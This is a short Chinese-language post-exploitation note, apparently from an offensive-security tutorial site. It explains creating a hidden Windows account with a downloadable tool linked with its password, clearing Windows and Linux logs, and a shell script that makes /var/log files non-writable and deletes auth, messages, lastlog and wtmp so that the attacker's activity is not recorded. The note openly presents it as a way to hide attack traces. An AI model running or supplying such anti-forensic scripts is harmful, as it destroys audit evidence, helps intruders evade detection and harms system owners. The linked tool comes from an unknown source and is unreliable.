ThinkChat2.0新版上线,更智能更精彩,支持会话、画图、阅读、搜索等,送10W Token,即刻开启你的AI之旅 广告
**建立windows隐藏账户** 用一个小工具生成服务端,去上传执行 链接:https://pan.baidu.com/s/18OIAWt4NXtX9-l1jBLeAng 密码:v5oa * * * * * **删除日志信息** **WIndows:** `eventvwr` 打开事件查看器删除最近日志 * * * * * **Linux:history -c** 写个脚本: **实现思路:** 1.查找系统和web组件日志 2.修改文件权限为不可写入(后续攻击中不记录日志,重启也不行) 3.删除可能暴露我们行踪的日志(删除我们的攻击记录) **代码实现:** ~~~ PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:~/bin export PATH #修改日志文件权限为不可写 find /var/log  -name *.log | xargs chmod 551 cd /var/log && chmod 551 auth && chmod 551 auth.1 && chmod 551 messages && chmod 551 messages.1 && chmod 551 lastlog && chmod 551 wtmp && chmod 551 news #删除日志 find /var/log  -name *.log -mmin +300 | xargs rm -rf cd /var/log && rm -rf auth.log && rm -rf auth.log.1 && rm -rf message && rm -rf message.1 && rm -rf lastlog && rm -rf wtmp && rm -rf news # /var/log:日志存储目录 # -name *.log:log后缀的日志文件 # -mmin +300:300分钟之前修改的文件 # xargs :将find命令查找到的文件列表作为参数,执行删除操作 ~~~